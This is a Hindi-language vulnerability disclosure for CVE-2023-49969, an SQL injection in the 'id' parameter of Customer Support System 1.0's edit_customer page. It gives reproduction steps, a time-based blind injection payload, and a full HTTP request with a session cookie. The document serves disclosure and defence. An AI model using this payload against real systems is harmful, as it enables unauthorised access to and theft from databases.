
ग्राहक सहायता प्रणाली 1.0 - "id" URL पैरामीटर के माध्यम से edit_customer में SQL इंजेक्शन भेद्यता
विवरण: ग्राहक सहायता प्रणाली के संस्करण 1 में एक SQL इंजेक्शन भेद्यता मौजूद है। एक दुर्भावनापूर्ण इरादे वाला हमलावर किसी ग्राहक को संपादित करते समय 'id' URL पैरामीटर में हेरफेर करके MySQL डेटाबेस पर SQL कमांड निष्पादित कर सकता है।
भेद्य उत्पाद संस्करण: ग्राहक सहायता प्रणाली 1.0
CVE लेखक: Geraldo Alcântara
तिथि: 28/11/2023
पुष्टि की गई: 19/12/2023
CVE: CVE-2023-49969
परीक्षण किया गया: Windows पर
1- एप्लिकेशन में लॉग इन करें।
2- customer_list पेज पर जाएं, "Action" बटन पर क्लिक करें, और "Edit" चुनें।
3- 'id' पैरामीटर पास किया जाएगा, जिससे एक दुर्भावनापूर्ण पेलोड डाला जा सकता है।
पेलोड: (select*from(select(sleep(5)))a)
GET /customer_support/index.php?page=edit_customer&id=(select*from(select(sleep(5)))a HTTP/1.1
Host: 192.168.68.182
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Connection: close
Referer: http://192.168.68.182/customer_support/index.php?page=customer_list
Cookie: PHPSESSID=arlocktakq815fq1lpm5fjml9n
Upgrade-Insecure-Requests: 1
खोजकर्ता/श्रेय:
Geraldo Alcântara